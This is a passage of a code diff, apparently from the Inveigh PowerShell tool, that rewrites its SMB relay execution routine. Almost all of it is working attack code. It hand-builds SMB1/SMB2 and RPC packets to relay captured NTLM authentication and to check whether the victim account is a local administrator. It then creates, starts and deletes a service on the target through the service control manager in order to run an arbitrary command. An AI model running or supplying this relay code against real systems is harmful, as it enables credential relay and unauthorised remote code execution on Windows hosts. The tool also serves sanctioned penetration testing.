+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+
+ 'CloseRequest'
+ {
+ $packet_SMB_header = Get-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = Get-PacketSMBCloseRequest 0x00,0x40
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'TreeDisconnect'
+ }
+
+ 'TreeDisconnect'
+ {
+ $packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = Get-PacketSMBTreeDisconnectRequest
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Logoff'
+ }
+
+ 'Logoff'
+ {
+ $packet_SMB_header = Get-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = Get-PacketSMBLogoffAndXRequest
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
- }
+ if($SMB_relay_failed)
+ {
+ $inveigh.console_queue.Add("SMB relay failed on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target")])
+ $SMB_client_stage = 'Exit'
+ }
- if ($k -eq 5)
- {
- $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)
- $SMB_context_handler = $SMB_relay_execute_bytes[88..107]
-
- if([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_context_handler) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
- {
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget")])
- }
- elseif([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '05-00-00-00')
- {
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $SMBRelayTarget")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $SMBRelayTarget")])
- $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget")
- $SMB_relay_failed = $true
- }
- else
- {
- $SMB_relay_failed = $true
}
- }
- elseif (($k -eq 7) -or ($k -eq 9) -or ($k -eq 11))
+ }
+ else
{
- $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)
+
+ $SMB_client_stage = 'TreeConnect'
- switch($k)
+ :SMB_execute_loop while ($SMB_client_stage -ne 'exit')
{
- 7
+ switch ($SMB_client_stage)
{
- $SMB_context_handler = $SMB_relay_execute_bytes[92..111]
- $SMB_relay_execute_error_message = "Service creation fault context mismatch"
- }
+
+ 'TreeConnect'
+ {
+ $SMB2_message_ID = 4
+ $packet_SMB2_header = Get-PacketSMB2Header 0x03,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_data = Get-PacketSMB2TreeConnectRequest $SMB_path_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'CreateRequest'
+ }
+
+ 'CreateRequest'
+ {
+ $SMB2_tree_ID = 0x01,0x00,0x00,0x00
+ $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = Get-PacketSMB2Header 0x05,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_data = Get-PacketSMB2CreateRequestFile $SMB_named_pipe_bytes
+ $packet_SMB2_data["SMB2CreateRequestFile_Share_Access"] = 0x07,0x00,0x00,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'RPCBind'
+ }
+
+ 'RPCBind'
+ {
+ $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID
+ $packet_SMB2_data["SMB2WriteRequest_Length"] = 0x48,0x00,0x00,0x00
+ $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'OpenSCManagerW'
+ }
+
+ 'ReadRequest'
+ {
+
+ Start-Sleep -m 150
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = Get-PacketSMB2Header 0x08,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header["SMB2Header_CreditCharge"] = 0x10,0x00
+ $packet_SMB2_data = Get-PacketSMB2ReadRequest $SMB_file_ID
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
+ {
+ $SMB_client_stage = $SMB_client_stage_next
+ }
+ else
+ {
+ $SMB_client_stage = 'StatusPending'
+ }
+
+ }
+
+ 'StatusPending'
+ {
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
+ {
+ $SMB_client_stage = $SMB_client_stage_next
+ }
+
+ }
+
+ 'OpenSCManagerW'
+ {
+ $SMB2_message_ID = 30
+ $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
+ $packet_SCM_data = Get-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $SCM_data.length
+ $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'CreateServiceW'
+ }
+
+ 'CreateServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[108..127]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
+ {
+ $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")])
+ $SMB_service_manager_context_handle = $SMB_client_receive[108..127]
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
+ $packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $PsExec_command_bytes $PsExec_command_length_bytes
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $SCM_data.length
+ $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00')
+ {
+ $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")])
+ $SMB_relay_failed = $true
+ }
+ else
+ {
+ $SMB_relay_failed = $true
+ }
+
+ }
+
+ 'StartServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '00-00-00-00')
+ {
+ $inveigh.console_queue.Add("SMB relay service $SMB_service created on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")])
+ $SMB_service_context_handle = $SMB_client_receive[112..131]
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
+ $packet_SCM_data = Get-PacketSCMStartServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $SCM_data.length
+ $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target")])
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'DeleteServiceW'
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '31-04-00-00')
+ {
+ $inveigh.console_queue.Add("SMB relay service $SMB_service creation failed on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")])
+ $SMB_relay_failed = $true
+ }
+ else
+ {
+ $SMB_relay_failed = $true
+ }
+
+ }
+
+ 'DeleteServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '1d-04-00-00')
+ {
+ $inveigh.console_queue.Add("SMB relay command executed on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")])
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '02-00-00-00')
+ {
+ $inveigh.console_queue.Add("SMB relay service $SMB_service failed to start on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("SMB relay service $SMB_service failed to start on $Target")])
+ }
+
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
+ $packet_SCM_data = Get-PacketSCMDeleteServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $SCM_data.length
+ $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'CloseServiceHandle'
+ $SMB_close_service_handle_stage = 1
+ }
+
+ 'CloseServiceHandle'
+ {
+
+ if($SMB_close_service_handle_stage -eq 1)
+ {
+ $inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")])
+ $SMB2_message_ID += 20
+ $SMB_close_service_handle_stage++
+ $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_context_handle
+ }
+ else
+ {
+ $SMB2_message_ID += 1
+ $SMB_client_stage = 'CloseRequest'
+ $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
+ }
+
+ $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $SCM_data.length
+ $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+
+ 'CloseRequest'
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = Get-PacketSMB2Header 0x06,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_data = Get-PacketSMB2CloseRequest $SMB_file_ID
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'TreeDisconnect'
+ }
+
+ 'TreeDisconnect'
+ {
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = Get-PacketSMB2Header 0x04,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_data = Get-PacketSMB2TreeDisconnectRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Logoff'
+ }
+
+ 'Logoff'
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = Get-PacketSMB2Header 0x02,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_data = Get-PacketSMB2SessionLogoffRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Exit'
+ }
- 11
- {
- $SMB_relay_execute_error_message = "Service start fault context mismatch"
}
- 13
+ if($SMB_relay_failed)
{
- $SMB_relay_execute_error_message = "Service deletion fault context mismatch"
+ $inveigh.console_queue.Add("SMB relay failed on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target")])
+ $SMB_client_stage = 'Exit'
}
}
-
- if([System.BitConverter]::ToString($SMB_context_handler[0..3]) -ne '00-00-00-00')
- {
- $SMB_relay_failed = $true
- }
-
- if([System.BitConverter]::ToString($SMB_relay_execute_bytes[88..91]) -eq '1a-00-00-1c')
- {
- $inveigh.console_queue.Add("$SMB_relay_execute_error_message service on $SMBRelayTarget")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $SMB_relay_execute_error on $SMBRelayTarget")])
- $SMB_relay_failed = $true
- }
-
- }
- else
- {
- $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)
- }
- if(!$SMB_relay_failed -and $k -eq 7)
- {
- $inveigh.console_queue.Add("SMB relay service $SMB_service created on $SMBRelayTarget")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $SMBRelayTarget")])
}
- elseif((!$SMB_relay_failed) -and ($k -eq 9))
- {
- $inveigh.console_queue.Add("SMB relay command likely executed on $SMBRelayTarget")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command likely executed on $SMBRelayTarget")])
-
- if($SMBRelayAutoDisable -eq 'Y')
- {
- $inveigh.SMB_relay = $false
- $inveigh.console_queue.Add("SMB relay auto disabled due to success")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success")])
- }
- }
- elseif(!$SMB_relay_failed -and $k -eq 11)
- {
- $inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $SMBRelayTarget")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $SMBRelayTarget")])
- }
-
- $SMB_relay_execute_ReadAndRequest = 0x00,0x00,0x00,0x37,0xff,0x53,0x4d,0x42,0x2e,0x00,0x00,0x00,0x00,
- 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x08 +
- $inveigh.process_ID_bytes +
- $SMB_user_ID +
- $SMB_multiplex_ID +
- 0x00,0x0a,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x58,
- 0x02,0x58,0x02,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00
-
- if($SMB_relay_failed)
+ if(!$SMB_relay_failed -and $RelayAutoDisable -eq 'Y')
{
- $inveigh.console_queue.Add("SMB relay failed on $SMBRelayTarget")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $SMBRelayTarget")])
- BREAK SMB_relay_execute_loop
+ $inveigh.SMB_relay = $false
+ $inveigh.console_queue.Add("SMB relay auto disabled due to success")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success")])
}
- $k++
}
- $inveigh.SMB_relay_active_step = 0
$SMB_relay_socket.Close()
+
+ return $SMB_client_receive
}
}
-# HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener
+# HTTP/HTTPS Server ScriptBlock
$HTTP_scriptblock =
{
- param ($Challenge,$SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$WPADAuth)
+ param ($Challenge,$HTTPIP,$HTTPPort,$Target,$Command,$Usernames,$RelayAutoDisable,$WPADAuth,$SSL,$certificate,$SMB_version,$Service)
function NTLMChallengeBase64
{
